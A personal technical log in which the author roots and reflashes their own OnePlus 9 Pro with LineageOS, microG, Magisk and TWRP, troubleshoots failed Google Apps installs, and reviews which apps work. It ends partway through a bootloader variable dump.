[adb](https://developer.android.com/studio/command-line/adb)
I consider this an important backup access to the phone. If the screen fails then this allows you to pull any important files off over usb.
Steps for this are above.
## Installing "Lineage for microG" (tried, rejected for now)
* <https://lineage.microg.org/> has install and download links
* Download image from <https://download.lineage.microg.org/lemonadep/>
* check sha: `sha256sum -c lineage-18.1-20211220-microG-lemonadep.zip.sha256sum`
* run update_verifier python script:
* download (or clone) [python update_verifier](https://github.com/lineageos4microg/update_verifier) - <https://github.com/lineageos4microg/update_verifier/archive/refs/heads/master.zip>
* setup python3 with [asdf-vm](https://asdf-vm.com/) (I had python 3 but no pip, and I like to use adsf)
* extract the zip, open terminal in extracted folder
* `asdf plugin add python`
* `asdf install python 3.10.1`
* `asdf local python 3.10.1`
* `pip install -r requirements.txt`
* `python update_verifier.py lineageos4microg_pubkey ../lineage-18.1-20211220-microG-lemonadep.zip`
* output: `verified successfully`
* Go back to lineage install instructions <https://wiki.lineageos.org/devices/lemonadep/install>
* Boot to fastboot
* flash the lineage-microG recovery: `fastboot flash boot lineage-18.1-20211220-microG-lemonadep-recovery.img`
* copy partitions as instructed
* boot into recovery (vol-down + power)
* or "enter recovery" from lineage fastboot
* "apply update" > "apply from adb" (aka sideload)
* `adb sideload ../LineageOS/copy-partitions-20210323_1922.zip`
* Ignore unknown sig and "continue"
* wipe
* boot into recovery (vol-down + power) if not already in it
* "format data / factory reset"
* OS install
* boot into recovery (vol-down + power) if not already in it
* "apply update" > "apply from adb" (aka sideload)
* `adb sideload lineage-18.1-20211220-microG-lemonadep.zip`
* reboot
* skip all the guided setup steps
* open the microG app
* run the self check (all green ticks for me, woo)
So now I have a clean LineageOS install with a FOSS re-implementation of google's proprietary shared services. Win.
Now re-run magisk sideload from above to get root again.
* re-enable adb as before
* re-enable advance power button menu
* `adb install Magisk-v23.0.apk`
* grab a [payload-dumper-go binary release](https://github.com/ssut/payload-dumper-go/releases/latest)
* `payload-dumper-go_1.2.0_linux_amd64/payload-dumper-go lineage-18.1-20211220-microG-lemonadep.zip`
* `adb push extracted_20211221_231517/boot.img /sdcard/Download/`
* run the patch in the phone Magisk UI (under "install")
* get the filename to pull: `adb shell ls /sdcard/Download`
* `adb pull /sdcard/Download/magisk_patched-23000_d5mu3.img`
* reboot to fastboot
* `fastboot flash boot magisk_patched-23000_d5mu3.img`
* "reboot system now" in lineage fastboot menu
Success, now I have root *and* microG.
Next, see if Aurora does the job, and if not how do I get google play on top of microG, if that's even possible. Till next time...
### Getting apps
#### F-Droid
F-Droid is preinstalled (stared blankly at app list for a while before spotting it!) so that was easy, this can install *many* open source apps, and warns about "anti-features" which is a nice touch.
Used F-Droid to install andOTP as a test (alternative to google authenticator 2FA app). Worked well.
#### Apps from play store - Aurora
Found Aurora in f-droid with a search, installed no problems, opened it up.
First thing it does is prompt for install type which is confusing and lacks enough context to know what it means. The four types are explained further here: <https://auroraoss.com/faq/#how-does-aurora-store-install-apps> though I'm still not really sure. I don't know what a "split apk" is yet, and I don't see if there's a difference between root and services as I could do either and they both say they do the same thing.
* Session - recommended but not clear why, I think it's saying it's like "Aurora Services" but with more something-or-other
* Native - doesn't support split apks, that sounds bad, see below for what they are (see below for split apk research)
* Root - auto install when downloaded
* Aurora Services - auto install when downloaded
How to choose? I guess I'll go with the recommendation.
Couple of theme questions. Meh.
Installer question: "Select a suitable installer"
* External Storage Access [grant] - pops and allow dialog, clicked "allow"
* External Storage Manager [grant] - required on R+ (aka android 11), which we are running, guess I'll need that, - opened permissions screen, toggled to allow
* Installer Permission [grant] - opened permissions screen, toggled to allow
"Finish"
Log in using:
* Google
* Anonymous
It seems from what I've read in the FAQ and terms that using the real login is best because the anon accounts end up with random locales and app restrictions depending on where the login was generated.
[install keepassdroid and push my kdb across with adb to get the google login, eventually the kdb will be sync'd with syncthing]
... log in with google ...
And we're in, app listing showing. Disconcerting to see disney+ etc in "free" app store on a "free" phone.
WhatsApp isn't available in f-droid so let's try that as an experiment... It's in the list... it installed... it opened... it worked! (And logged me out of the other phone, fucking whatsapp).
##### What's a split APK?
* APK splitting - <https://developer.android.com/studio/build/configure-apk-splits>
* Android App Bundles - defers apk generation to play store <https://developer.android.com/guide/app-bundle>
* Feature delivery - partial app additions and updates <https://developer.android.com/guide/playcore/feature-delivery>
* Old unsupported app "SAI" split apk installer:
* <https://forum.xda-developers.com/t/guide-split-apk-installation.3934631/>
* <https://github.com/Aefyr/SAI>
* <https://www.reddit.com/r/androiddev/comments/cenuvs/what_is_it_with_publishing_split_apks_on_google/>
* <https://www.reddit.com/r/androiddev/comments/ci4a7r/confused_about_split_apk/>
### The state of the system
What's working and what isn't.
#### Google voice to text (dead)
The keyboard has a little mic button which allows you to use google's services to enter text anywhere you like by speaking. This is useful as I hate phone keyboards. I use it quite a lot. Unsurprisingly with the microG setup that's not working at all. The button is there but it does nothing.
#### Bluetooth (working)
Headphones connected and played no problem.
### The state of the apps
What's working and what isn't.
#### Banking apps (mixed)
Let's start with the big one. This is most likely to sink an open source effort as they try to protect themselves by joining in the lockdown.
Surprisingly two out of three of the banking apps I'd like to use actually worked on the rooted custom ROM with an unlocked bootloader. I had not turned on the magisk hide capability at this point. One banking app behaved as if nothing was different, one popped a warning but allowed the app to continue and one flat out refused to run. I'm not going to name the banks involved on the public internet as I don't want to encourage anyone to test the security of my banking.
One of the apps logged me out of my other phone. The other functioning app offered to transfer a "digital key" to the new device, and without that allowed me to use the first phone to generate a login code and use that to poke around. I didn't try transferring the key.
More worrying was the realisation that I'd been locked in to running a google/iOS locked-down device by one of the banks as they are an "app-first" bank. You can't even use the online banking without the phone app, and the phone app requires a locked and signed phone. It's only by going on this very journey of actually trying to set up a phone that I control that I'd even noticed this insidious creeping embrace of platform-lockin. So now to truly escape the platform, I have to change banks as well.
#### Google calendar (mostly working)
I'm afraid I still use google's calendar, and there's a high cost of change as I've got my other half using a shared calendar. The calendar worked fine, although oddly the "widget" (view of calendar that can be placed on the phone's desktop when unlocked) was blank until I left the phone in the drawer with wifi off for two days. For who-knows-what reason when I got it out the drawer it has started working.
Oddly the events have shown up but reminders are missing. This is a bit of a problem as I use them a lot. It's not that they're local to my other phone because they show on the google calendar web interface too.
#### Amazon things (working)
The amazon shopping app worked no problem.
To my surprise the amazon prime video app worked and played content as normal. I rather expected some kind of DRM smackdown to kick in on a rooted device.
Audible worked and played no problem.
#### Spotify (working)
Again pleasingly working with no quibbling or warnings. This is more important to me at the moment than perhaps it should be.
Casting sound to chromecast audio not working.
#### Whatscrapp (working)
Much as I hate WhatsApp and it being owned by Facebook/Meta .... thanks to network effect I kinda still need it. I've managed to get some of my contacts over to telegram/signal but not everyone.
WhatsApp worked but signed me out of the other phone (ffs). Bonus points for receiving an important message from someone I haven't heard from in about a year on the wrong phone. Ugh.
So on the plus side I've learned of another reason to dislike WhatsApp.
### Hiding the unlock & root
Magisk has in its settings a "hide" option. This had no noticeable effect on the "SafetyNet" test (still three of three tests fail for me) built in to Magisk. I didn't notice any change in app behaviour in my limited poking.
### WiFi-based location (turn on)
Understandably from a freedom-warrior point of view the wifi-based location services are off by default, but this is a bit of a pain because if you've ever used pure GPS positioning you'll know it's shit at doing it in houses, offices and built up areas, takes ages to get a lock, and is a bit hit and miss in cars. The accuracy you normally see is much more a function of the ubiquity of wifi in our urban lives.
### Screen refresh rate 60/120Hz (increase)
The "minimum screen refresh rate" setting was set to 60Hz. There's also a developer option for showing the current rate. In my experiment it sat at 60Hz all the time. This is fine till you scroll up and down, then you notice how much smoother the text scrolls at 120Hz. I upped the minimum to 120Hz which seemed to work.
There's also a smooth-scroll option that I turned on that seems to produce a nicer effect.
## Using adb to do backups
It might be possible to backup a locked down phone without root by using adb's backup capabilities. I haven't looked into this much or tried it yet but here's some quick research notes:
* [gist: Backup android app, data included, no root needed, with adb](https://gist.github.com/AnatomicJC/e773dd55ae60ab0b2d6dd2351eb977c1)
* <https://net2.com/how-to-backup-and-restore-your-android-device-with-adb-on-ubuntu/>
* <https://www.paulligocki.com/backup-restore-android-with-adb/>
* <https://stackpointer.io/mobile/android-adb-backup-extract-restore-repack/372/>
* <https://stackoverflow.com/questions/19225467/backing-up-android-device-using-adb>
* <https://android.stackexchange.com/questions/69567/what-all-does-adb-backup-and-how-do-i-restore-part-of-it>
This might give me a way of rescuing some of my data from my old phone that de-rooted itself in an OS upgrade and fucked my titanium backups (still bitter).
Oh but wait...
> [Devs can set the ALLOW_BACKUP flag to "No"](https://android.stackexchange.com/questions/69567/what-all-does-adb-backup-and-how-do-i-restore-part-of-it#comment125038_69576)
Argh, what is wrong with this platform.
## Customisations
* Turn on all the power button options:
* Settings > system > advanced (ffs) > gestures (wtf?) > power menu > advanced restart [on]
## Options - what now?
That's been an enlightening exercise in "is this even possible". I've learned a huge amount about the current state of the phone ecosystem. I'm in equal measure dismayed and hopeful, there are some unpleasant trends and circumstances, and some really encouraging signs of hope for the open ecosystem.
There really isn't a clear answer for me for where to go from here. There are downsides and challenges in every direction.
The options available seem to be in increasing order of freedom and somewhat decreasing order of utility:
* Get an iPhone and abandon my principles and control, go live in a digital nursing home. - YeahNo.
* get banking apps galore
* never get root again
* trust apple to administer the correct dosage of backups
* forever more fight the divide between iOS and my linux laptops
* Install Oxygen 11, relock the bootloader, live without root, have no upgrade path because Oxygen is dead. - No.
* possibly brick the phone trying to lock it
* get banking apps
* never get root again
* never have decent backups
* forever more fight the divide between iOS and my linux laptops
* Install lineage and one of the google apps installers
* still no bank
* probably get reliable google goodness
* get stalked by google (no change there, I don't mind as much as some about this)
* unknown time-to-failure
* I think this is probably the most "mainstream" of the subversive options so is most likely to continue to have a forward path for the next few years
* worry about security of unlocked everything and the security of lineage - I think it's probably no worse than linux at this point but who knows
* Install lineage-for-microG (current experiment)
* no bank, no voice-to-text
* worry more about the security of build servers for this niche option
* I don't know how sustainable this project is, it's certainly noble
* go all in and run a linux distro
* definitely no apps for you
* get to take the moral high ground
* lose touch with everyone who is on whatsapp
It would be nice to think that by choosing to run the most open thing I can I am in some way helping, but I think the truth is users really don't make much difference to projects like this unless they come in enough numbers to sway app vendors like WhatsCrapp to support more obscure platforms. It's only the hackers and those who can financially fund projects who really make a difference here. So while I want to run the most open thing I can it doesn't really matter a hill of beans outside of my own brain whether I do or not.
I think having written down the options I'm swinging towards lineage + proprietary google services. This seems to solve the immediate problem of getting unlocked and rooted and getting working backups again without losing everything that's useful to me in the process.
I'm glad I've tried the microG version, and hope we see open source slowly chip away at the power of the two giants just like Linux did in the desktop space over decades.
## Installing LineageOS + google services on OnePlus 9 Pro (take 2) - fail
I now have the lineage bootloader so the steps to get into recovery etc are a bit different than with stock or TWRP.
> "Note: If you want the Google Apps add-on on your device, you must follow this step before booting into LineageOS for the first time!" ~ <https://wiki.lineageos.org/devices/lemonadep/install#installing-lineageos-from-recovery>
1. Download latest nightly (there's no stable/unstable on this): <https://download.lineageos.org/lemonadep> - this has both the ROM (OS image) and the recovery image.
1. Download copy-partitions <https://androidfilehost.com/?fid=2188818919693768129> (as per wiki)
1. The sha256 for the copy I have is `200877dfd0869a0e628955b807705765a91e34dff3bfeca9f828e916346aa85f copy-partitions-20210323_1922.zip`
1. Verify all the sha256 sums: `sha256sum -c *.sha256`
1. Boot to fastboot
1. flash the lineage recovery: `fastboot flash boot lineage-18.1-20211228-recovery-lemonadep.img`
1. don't reboot yet
1. copy partitions as instructed
1. switch to recovery
1. "apply update" > "apply from adb" (aka sideload)
1. `adb sideload copy-partitions-20210323_1922.zip`
1. Ignore unknown sig and "continue"
1. come back out of recovery menu (don't reboot yet)
1. don't reboot yet
1. "factory reset" > "wipe all data"
1. don't reboot yet
1. flash OS:
1. "apply update" > "apply from adb" (aka sideload)
1. `adb sideload lineage-18.1-20211228-nightly-lemonadep-signed.zip`
1. don't reboot yet
1. MindTheGapps - I haven't found any instructions for this anywhere
1. check the arch (it's `arm64`) here <https://wiki.lineageos.org/devices/lemonadep/>
1. Download the arm64 build from <https://androidfilehost.com/?w=files&flid=322935>
1. or the "mirror" <http://downloads.codefi.re/jdcteam/javelinanddart/gapps>
1. Given there's no shas anywhere I downloaded from several mirrors and cross-checked the hashes. `85481cb98c8a8692f52c033ead1db436870af385498a917701fcd8c6182e145c MindTheGapps-11.0.0-arm64-20210920_084011.zip`
1. "apply update" > "apply from adb" (aka sideload)
1. `adb sideload MindTheGapps-11.0.0-arm64-20210920_084011.zip`
1. ignore signature warning (the price of escaping a closed ecosystem)
1. error shown on phone, roughly:
```
low resource device detected, removing large extras
not enough space for gapps! aborting
...
error in /sideload/package.zip (status 1)
```
1. [patch that adds error message](https://gitlab.com/MindTheGapps/vendor_gapps/-/commit/0f6b4560288267b644c49de0fdc538fa30980708)
1. [current message on `sigma` branch](https://gitlab.com/MindTheGapps/vendor_gapps/-/blob/de0847802034654d63150c3de3ca05f1af326316/build/meta/com/google/android/update-binary#L38)
1. In lineage recovery, mount `system` and enable adb, run df:
```
OnePlus9Pro:/ # df -h /mnt/system
Filesystem Size Used Avail Use% Mounted on
/dev/block/dm-2 0.9G 0.9G 3.0M 100% /mnt/system
```
That is indeed quite full. Annoyingly the installer doesn't say which partition is full.
1. Some ideas here <https://forum.xda-developers.com/t/q-insufficient-storage-space-in-system-partition.3018464/>
1. Try format & reboot to recovery, nope.
1. hint that it could be slot related <https://www.reddit.com/r/LineageOS/comments/fuykda/lineage_os_171_opengapps_error_not_sufficient/>
1. let's try a swap slot as per <https://www.reddit.com/r/LineageOS/comments/fqashj/difficulty_installing_gapps_after_lineage_os/fluhd8s/?context=3>
1. enter fastboot
```
tim@max:~/Downloads/oneplus9pro/MindTheGapps
$ fastboot set_active other
Setting current slot to 'b' OKAY [ 0.043s]
Finished. Total time: 0.044s
```
1. enter recovery
1. re-run the sideload
1. "apply update" > "apply from adb" (aka sideload)
1. `adb sideload MindTheGapps-11.0.0-arm64-20210920_084011.zip`
1. ignore signature warning (the price of escaping a closed ecosystem)
1. same space error. sigh
### Possible cause of space error
1. [Partition not mounted at all](https://forum.xda-developers.com/t/q-insufficient-storage-space-in-system-partition.3018464/post-76072942)
1. [LineageOS image has partitions that are too small](https://forum.xda-developers.com/t/q-insufficient-storage-space-in-system-partition.3018464/#post-84651523) to fit extra g-apps in.
* Maybe use [TWRP BigSys](https://forum.xda-developers.com/t/dev-kernel-4-4-android-8-0-oreo.3688948/) to get bigger partitions??
    * Manually re-partition? Allegedly dangerous.
* <https://android.stackexchange.com/questions/216123/android-how-to-increase-system-partition-and-decrease-data-partition#comment276924_216123> warning of brickability if you touch wrong device
* <https://www.reddit.com/r/Android/comments/2o8lvf/why_cant_we_resize_partitions_on_android_but_on/>
1. [Incompatibility with Lineage bootloader - use TWRP instead](https://www.reddit.com/r/LineageOS/comments/fu70jg/linageos_171_unable_to_install_gapps/) - worth a try I think, probably the next thing I'll try.
1. Ruled Out: [Wrong/stale slot in use](https://www.reddit.com/r/LineageOS/comments/fuykda/lineage_os_171_opengapps_error_not_sufficient/) - tried swap slot (above), no change.
1. Ruled out: Booting phone before gapps install (didn't do this so not this).
### Patching the installer - abandoned
It seems to me having read around that the error message is hiding useful information on the state of the device and what exactly failed. (Which partition is out of space? Is it just read only or something?). I'm not feeling like playing with partitioning given the warnings I saw on a forum of potentially bricking a device.
There's links to the source above and I did start fiddling with this, but you have to figure out how to re-sign the zip to get it to install at which point I fell down an android-sized rabbit hole.
#### Signing zips and apks
Here's what I found so far, I haven't got it working yet.
I *think* it's the same signing that you have to do to `apk` files, and `apk` is just a special shaped `zip` file. Off into learning-android-sdk-land I went...
* There's some kind of strange android app that can sign zips called [ZipSigner](https://f-droid.org/forums/topic/zipsigner/)
* [ZipSigner is missing source code](https://code.google.com/archive/p/zip-signer/issues/3) so you are relying on random binaries. Dodgy but probably well intentioned.
* <https://android.stackexchange.com/questions/222262/how-to-create-manually-create-my-own-%e1%b4%8f%e1%b4%9b%e1%b4%80-update-file-to-be-used-for-adb-sideload>
* <https://android.stackexchange.com/questions/95425/update-zip-just-for-fixing-file-permissions-possible>
* <https://forum.xda-developers.com/t/tutorial-the-updater-script-completely-explained.2377695/>
* <https://www.bettermobileapp.com/article/10558021/Updater-script>
* <https://android.stackexchange.com/questions/191043/edditing-updater-script>
* <https://androidforums.com/threads/custom-rom-updater-scipt-troubleshooting.701752/>
* <https://android.stackexchange.com/questions/35600/how-to-create-an-update-zip-file-that-can-copy-rename-a-file>
* <https://developer.android.com/studio/command-line/zipalign>
* <https://developer.android.com/studio/publish/app-signing#opt-out>
* <https://developer.android.com/studio/command-line/apksigner>
* <https://www.addictivetips.com/mobile/what-is-zipalign-in-android-and-how-it-works-complete-guide/>
* <https://stackoverflow.com/questions/3994035/what-is-aligned-memory-allocation>
* <https://www.androidcentral.com/installing-android-sdk-windows-mac-and-linux-tutorial>
### Let's try TWRP+Lineage+MindTheGapps - fail
#### Install TWRP
<https://www.getdroidtips.com/replace-lineageos-recovery-twrp/>
1. Reboot phone to fastboot or something (the built-in one where the volume key changes options), leave it in that state
1. `fastboot devices` on linux should show the phone
1. `fastboot boot twrp.img` (already downloaded and symlinked above)
1. Phone reboots into twrp temporarily
1. Advanced > flash current twrp
1. Reboot (ok the no-OS warning)
1. Yay, booted into twrp, comforting
#### Install LineageOS (yet again)
* Well, let's get a new nightly
* Instructions say check model...
* Reboot to twrp (recovery) with USB connected to laptop
* Laptop pops window for new mount `mtp://OnePlus_LE2123_dade278d/`
* Yep, LE2123 is in the supported list. Phew.
* Skip all the "recovery" steps in <https://wiki.lineageos.org/devices/lemonadep/install>
* I'm guessing I don't need to run "copy partitions" again because that's to avoid only having one working slot, and I already have two, having done this before. Tell me if I'm wrong!
* Give up waiting for new image download (~1GB), continue with older image...
* Factory reset
* TWRP > Wipe > Swipe for factory reset
* back
* Format Data (button)
* type yes to continue (wiping all apps & data)
* back to main menu (android back button lots of times)
* Flash lineage
* Still in TWRP
* Advanced > ADB Sideload
* Tick the wipe boxes ("Dalvik cache" + "cache")
  * Swipe to start sideload
* `adb sideload lineage-18.1-20211228-nightly-lemonadep-signed.zip`
* back
* Don't reboot yet
* Add MindTheGapps
* still in TWRP
* ADB Sideload
* swipe (cache wipe still selected)
* `adb sideload MindTheGapps-11.0.0-arm64-20210920_084011.zip`
* fail. log:
```
**********************
MindTheGapps installer
**********************
Extracting files
Setting up environment
Mounting partitions
Could not mount /mnt/system! Aborting
Updater process ended with ERROR: 1
```
For goodness sake.
Fuck it, let's try the other gapps even though it says not to....
Reboot just to have a look... Lineage running fine, no sign of any gapps.
### Let's try TWRP+Lineage+OpenGApps - fail
* Power off
* power + vol-down - ended up in lineage recovery, wat?? swap slot??
* reboot to bootloader? no that's the built-in pixelated bright green "START" thing, oh actually that's fine, that's the fastboot thing.
* switch slot as above
```
fastboot set_active other
Setting current slot to 'b'
... OKAY [ 0.048s]
Finished. Total time: 0.056s
```
* reboot to recovery
* back in TWRP
That's cool! I have lineage recovery in slot `a` and TWRP in slot `b`.
Okay, back to the plan.
#### Lineage (again again again...)
* Repeat the lineage install steps above (no idea if that's really necessary but *shrug*)
#### OpenGApps install - fail
* Download <https://opengapps.org/?api=11.0&variant=nano> - ARM64 / 11 / nano
* (manually changed from 10 to 11 from link on <https://wiki.lineageos.org/gapps>)
* download the md5 too
* `md5sum -c *.md5` to validate...
* Back to ADB Sideload in TWRP (cache wipe ticked x2), swipe to start
* `adb sideload open_gapps-arm64-11.0-nano-20220215.zip`
* cross fingers
* bah. failed, basically same error.
```
- Performing system space calculations
Insufficient storage space available in
System partition. ...
...
Error Code: 70
```
grab logs as instructed: `adb pull /sdcard/open_gapps_log.txt` - success
[gist of log file open_gapps_log.txt](https://gist.github.com/timabell/c4f16fd656f3faf8a16d06aa113e0346)
Important bit here is that there is **ZERO** space, so choosing smaller install is not going to work.
```
...
Current Free Space | 0
...
```
Well on the plus side the diagnostics are muuuuch better in OpenGApps so that's saved me fucking around trying to patch MindTheGapps' installer.
## Two-phone-Timmy - the burner phone
Having spent some time completely stumped by the space issue and giving it some thought I realize that this battle with Android will never end. Trying to get an unholy mix of Libre and proprietary to mix is like oil and water.
I can opt out of that battle by running two phones.
1. A "primary" phone that I use as much as possible, running the Free-est thing I can muster. This would get the sim card. This would be the OnePlus 9 pro, ideally running PureOS as per the Librem 5 phone, but if not that then Lineage without the GApps that I couldn't get to work.
2. A burner phone that's basically stock Android so that I can fall back to this for everything that can't or won't work on a free-er & unlocked base OS. (My existing OnePlus 5t for now while it lasts, reset to stock OxygenOS). This one can then get internet by tethering to the primary. I don't think any of the apps actually require the sim to be present. I guess we'll see.
### The primary (9 Pro)
The idea here is to get the free-est possible base layer (i.e. operating system), and then get maximum functionality within that. Anything that doesn't work or I can't find a working alternative to gets punted to the burner phone while we wait for hell to freeze over again. This will be the compromise for now.
* Research trying PureOS, see what the app ecosystem is like - done - nope
* research done, doesn't seem to be possible to install on the OnePlus. Next...
* Continue with Lineage (I left the phone with a working but empty install of this)
* **Don't install proprietary google play services or play store at all.** - This is the line in the sand. I would have accepted it for now, but given I couldn't install it, I'll take it as the new battle line for free vs proprietary.
* Install microG for re-implementation of shared services (i.e. location, polling for updates from servers etc)
* Install Aurora play store proxy again to be able to try out app store apps
* See how close I can get to a usable phone.
### The burner (5t)
* Factory reset the 5t
* Install just what I couldn't get to work on the primary
* Cry because the backups were shit and now I've lost access to something I care about (I predict)
## Primary setup - experimenting
Fired up the lineage (minus all google stuff) that I'd installed and then failed to get any gapps on (space issue above, no longer care).
Went through language prompt, was looking at time prompt in setup wizard when the phone rebooted with some kind of couldn't read data error. Disturbing. Rebooted, selected "try again" and it didn't do it this time.
### Setup wizard
- selected UK location,
- GMT timezone.
- Put in wifi password (incorrectly)
- set up pin
- set up fingerprint
- booted into OS (yay, pleasing to see Lineage in action)
### OS update with on-phone updater
settings > advanced > updater
shows list of OS updates. hit refresh, nothing new. latest is 18.1 26th Apr 2022
tap download ....
tap install (even longer pause ... installing ... finalising package installation ...) ..
reboot (press button that's presented)
### config
* turn off annoying sounds
* settings > sound > advanced
* screen locking sound - off
* touch sounds - off
### todo
* replacement contact management (currently using google)
* replacement calendar management (currently using google)
* insert sim
### already google-free
* email (fastmail domain + k9mail app)
* browser - firefox
* search - duckduckgo
* OTP - andOTP
* maps/satnav (partially) - could use waze + maps.me (google maps is a decent car satnav, not found a perfect equivalent)
## burner phone
No sim in this one, use wifi and/or bluetooth tethering to get internet on it.
Things I can't escape the googly jail for
* google maps?
* apps for clients
* microsoft outlook
* securid (vpn stuff)
* google authenticator (use andOTP instead wherever possible)
* microsoft authenticator (yuck, what's wrong with the OTP standard?!?!)
* digidentity
* banking apps that don't work on the primary phone (not naming because haxxors)
* google pay (never used it, just use an actual card)
* google home for controlling the chromecast
* spotify just for casting to the chromecast audio
To my horror I have discovered that android allows apps to force remote admin privs so that IT departments can snoop on your BYOD. Hello Microsoft Outlook + Active Directory. Yet more erosion of user rights in the name of security. There's no way in hell I'm allowing a client to be an admin on my primary phone so this is burner phone territory if at all necessary; though I just won't install any of that junk at all and will be uncontactable within their network unless on their supplied devices. Shrug.
## Primary phone - microG
### lineage+microG - failed install
Re-run setup in section: Installing “Lineage for microG”
* OS install
* power off
* boot into lineage recovery (vol-down + power) (currently slot "b" is active)
* "apply update" > "apply from adb" (aka sideload)
* `adb sideload lineage-18.1-20211220-microG-lemonadep.zip`
* it seems this is flashed to slot a and then slot is automatically swapped
* ignore signature warning
* accept downgrade warning
* completed
* back back
* factory reset
* reboot
* drops to bootloader thing
* "start" (power button to accept)
* loops back to bootloader thing. damn.
* vol down vol down - Recovery - power button to accept
* starts lineage recovery - "Active slot: a" - hmmm
try swap slot
```
$ fastboot set_active other
Setting current slot to 'b' (bootloader) Changing the active slot with a snapshot applied may cancel the update.
OKAY [ 0.038s]
Finished. Total time: 0.040s
```
power off, power on
that worked, now enters the lineage setup steps
oh but it's back to the blank OS, the apr 2022 version!
guess there's a slot for two OSes!
swap slot again, back to the bootloader loop. interesting.
let's try installing again
```
fastboot set_active other
Setting current slot to 'a' OKAY [ 0.060s]
Finished. Total time: 0.061s
```
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG
$ adb sideload lineage-18.1-20211220-microG-lemonadep.zip
serving: 'lineage-18.1-20211220-microG-lemonadep.zip' (~21%)
```
factory reset
reboot
cross fingers. nope. still just drops back to bootloader
recovery > factory reset > reboot
nope still fooked
reboot to bootloader which says "Active slot: b" which is a bit odd. Maybe it does a swap slot automatically after flashing?
so at this point slot a has a fooked lineage-microG (maybe) and slot b has a functioning but blank vanilla lineage. I think.
<https://www.reddit.com/r/GooglePixel/comments/8cz6m9/google_pixel_bootslot_b_brick/>
grab the vars with `fastboot getvar all 2>&1 | sort > fastboot-getvar.txt`
output (sensitive things redacted with XXXX) - interesting but not super helpful:
```
all:
(bootloader) battery-voltage:0
(bootloader) cpu-abi:arm64-v8a
(bootloader) current-slot:b
(bootloader) dynamic-partition:true
(bootloader) first-api-level:30
(bootloader) has-slot:abl_log:no
(bootloader) has-slot:abl:yes
(bootloader) has-slot:ALIGN_TO_128K_1:no
(bootloader) has-slot:ALIGN_TO_128K_2:no
(bootloader) has-slot:android_log:no
(bootloader) has-slot:aop:yes
(bootloader) has-slot:apdp_full:no
(bootloader) has-slot:apdp:no
(bootloader) has-slot:bluetooth:yes
(bootloader) has-slot:boot:yes
(bootloader) has-slot:carrier:no
(bootloader) has-slot:cdt:no
(bootloader) has-slot:connsec:no
(bootloader) has-slot:cpucp:yes
(bootloader) has-slot:ddr:no
(bootloader) has-slot:devcfg:yes
(bootloader) has-slot:devinfo:no
(bootloader) has-slot:dinfo:no
(bootloader) has-slot:dip:no
(bootloader) has-slot:DRIVER:no
(bootloader) has-slot:dsp:yes
(bootloader) has-slot:dtbo:yes
(bootloader) has-slot:engineering_cdt:yes
(bootloader) has-slot:featenabler:yes
(bootloader) has-slot:frp:no
(bootloader) has-slot:fsc:no
(bootloader) has-slot:fsg:no
(bootloader) has-slot:hyp_log:no
(bootloader) has-slot:hyp:yes
(bootloader) has-slot:imagefv:yes
(bootloader) has-slot:kernel_log:no
(bootloader) has-slot:keymaster:yes
(bootloader) has-slot:keystore:no
(bootloader) has-slot:limits-cdsp:no
(bootloader) has-slot:limits:no
(bootloader) has-slot:logdump:no
(bootloader) has-slot:logfs:no
(bootloader) has-slot:mdcompress:no
(bootloader) has-slot:mdtpsecapp:yes
(bootloader) has-slot:mdtp:yes
(bootloader) has-slot:metadata:no
(bootloader) has-slot:misc:no
(bootloader) has-slot:modemdump:no
(bootloader) has-slot:modemst1:no
(bootloader) has-slot:modemst2:no
(bootloader) has-slot:modem:yes
(bootloader) has-slot:multiimgoem:yes
(bootloader) has-slot:ocdt:no
(bootloader) has-slot:odm_b-cow:no
(bootloader) has-slot:odm:yes
(bootloader) has-slot:oplusdycnvbk:no
(bootloader) has-slot:opluslog:no
(bootloader) has-slot:oplusreserve1:no
(bootloader) has-slot:oplusreserve2:no
(bootloader) has-slot:oplusreserve3:no
(bootloader) has-slot:oplusreserve4:no
(bootloader) has-slot:oplusreserve5:no
(bootloader) has-slot:oplus_sec:yes
(bootloader) has-slot:oplusstanvbk:yes
(bootloader) has-slot:param:no
(bootloader) has-slot:persist_bkp:no
(bootloader) has-slot:persist:no
(bootloader) has-slot:product_b-cow:no
(bootloader) has-slot:product:yes
(bootloader) has-slot:qmcs:no
(bootloader) has-slot:qsee_log:no
(bootloader) has-slot:qupfw:yes
(bootloader) has-slot:qweslicstore:yes
(bootloader) has-slot:rawdump:no
(bootloader) has-slot:rtice:no
(bootloader) has-slot:sda:no
(bootloader) has-slot:sdb:no
(bootloader) has-slot:sdc:no
(bootloader) has-slot:sdd:no
(bootloader) has-slot:sde:no
(bootloader) has-slot:sdf:no
(bootloader) has-slot:secdata:no
(bootloader) has-slot:shrm:yes
(bootloader) has-slot:splash:yes
(bootloader) has-slot:spunvm:no
(bootloader) has-slot:ssd:no
(bootloader) has-slot:storsec:no
(bootloader) has-slot:super:no
(bootloader) has-slot:system_b-cow:no
(bootloader) has-slot:system_ext_b-cow:no
(bootloader) has-slot:system_ext:yes
(bootloader) has-slot:system:yes
(bootloader) has-slot:tzsc:no
(bootloader) has-slot:tz:yes
(bootloader) has-slot:uefisecapp:yes
(bootloader) has-slot:uefivarstore:no
(bootloader) has-slot:userdata:no
(bootloader) has-slot:vbmeta_system:yes
(bootloader) has-slot:vbmeta_vendor:yes
(bootloader) has-slot:vbmeta:yes
(bootloader) has-slot:vendor_b-cow:no
(bootloader) has-slot:vendor_boot:yes
(bootloader) has-slot:vendor:yes
(bootloader) has-slot:vm-bootsys:yes
(bootloader) has-slot:vm-data:no
(bootloader) has-slot:xbl_config:yes
(bootloader) has-slot:xbl:yes
(bootloader) hw-revision:0
(bootloader) is-logical:abl_a:no
(bootloader) is-logical:abl_b:no
(bootloader) is-logical:abl_log:no
(bootloader) is-logical:ALIGN_TO_128K_1:no
(bootloader) is-logical:ALIGN_TO_128K_2:no
(bootloader) is-logical:android_log:no
(bootloader) is-logical:aop_a:no
(bootloader) is-logical:aop_b:no
(bootloader) is-logical:apdp_full:no
(bootloader) is-logical:apdp:no
(bootloader) is-logical:bluetooth_a:no
(bootloader) is-logical:bluetooth_b:no
(bootloader) is-logical:boot_a:no
(bootloader) is-logical:boot_b:no
(bootloader) is-logical:carrier:no
(bootloader) is-logical:cdt:no
(bootloader) is-logical:connsec:no
(bootloader) is-logical:cpucp_a:no
(bootloader) is-logical:cpucp_b:no
(bootloader) is-logical:ddr:no
(bootloader) is-logical:devcfg_a:no
(bootloader) is-logical:devcfg_b:no
(bootloader) is-logical:devinfo:no
(bootloader) is-logical:dinfo:no
(bootloader) is-logical:dip:no
